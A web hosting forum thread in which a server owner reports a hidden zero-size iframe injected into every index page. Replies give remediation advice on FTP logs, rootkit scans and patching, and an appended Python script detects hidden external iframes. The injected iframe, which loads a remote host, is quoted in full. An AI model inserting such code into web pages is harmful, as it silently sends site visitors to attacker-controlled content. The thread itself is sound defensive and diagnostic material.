
Server Attack? Malicious code

LuisA

New Pleskian
Hi everyone, first I'm sorry for my bad English.
I have a dedicated server with Plesk 9.2. Days ago I saw this code in all pages on my server. I have 16 sites allowed, but I see it in all index pages (first and second level):


<!-- ~ --><iframe src="http://livelnternet.net/s/in.cgi?3" width="0" height="0" style="display:none"></iframe><!-- ~ -->

That code was included in all index pages of all sites on my server.

I removed them one by one... How can I stop that type of attack? How can I make a script to find that code in all pages allowed on my server?

Thanks
 
Hi,

Check your logfiles to determine the entry point. This behaviour mostly originates from hacked FTP accounts – so have a look at your xferlogs to determine the account. If you cannot find anything there, this could have been caused by injection & co. – maybe some kind of script-based shell was placed onto your server. Try to find it with rkhunter and check the access logs to determine the hacked domain, and update any outdated software. I'm pretty sure that one of the steps above will lead to success. The hardest thing is to close the security hole – some months ago I had a similar issue which was finally caused by a compromised client PC (a reseller's machine) which stored a lot of FTP passwords, even from other client accounts.

So… Good Luck!
 
Indicative of either multiple FTP accounts compromised, or the system has been compromised as the root user.

In regard to FTP events, where your users' account(s) are getting compromised, we added ClamAV support to the psa-proftpd daemon in ASL. This can help out a lot if your users' credentials being compromised is a recurring problem.
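
Added example, not part of any post in this thread: a Python script for the question in the first post, how to find the injected code in all pages on the server. It goes beyond the exact string and reports every hidden iframe (zero width or height, or hidden by CSS) whose src points to an external host; the list of file extensions and the root directory argument are assumptions.

```python
import os
import re
import sys
from urllib.parse import urlparse

# Assumption: which file types to inspect; adjust for the server's stack.
PAGE_EXTENSIONS = (".html", ".htm", ".php", ".asp", ".aspx", ".js", ".tpl")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Markers of an invisible frame: zero width/height or CSS hiding.
HIDDEN_RE = re.compile(
    r"""\b(?:width|height)\s*=\s*["']?0(?:px)?["'\s>]"""
    r"""|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)

def hidden_iframes(text):
    """Return the src host of every hidden iframe that loads an external URL."""
    hosts = []
    for tag in IFRAME_RE.findall(text):
        src = SRC_RE.search(tag)
        if not src or not HIDDEN_RE.search(tag):
            continue
        host = urlparse(src.group(1)).hostname
        if host:  # relative URLs have no host and are skipped
            hosts.append(host)
    return hosts

def scan_tree(root):
    """Walk root and return sorted (path, host) pairs for suspicious files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PAGE_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip it, do not abort the scan
            findings.extend((path, host) for host in hidden_iframes(text))
    return sorted(findings)

if __name__ == "__main__":
    # Assumption: argv[1] is the directory holding all site document roots.
    for path, host in scan_tree(sys.argv[1]):
        print(f"{path}\thidden iframe -> {host}")
```

The file modification times of the reported pages give a time window to search for in the xferlogs and access logs mentioned in the replies above.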
 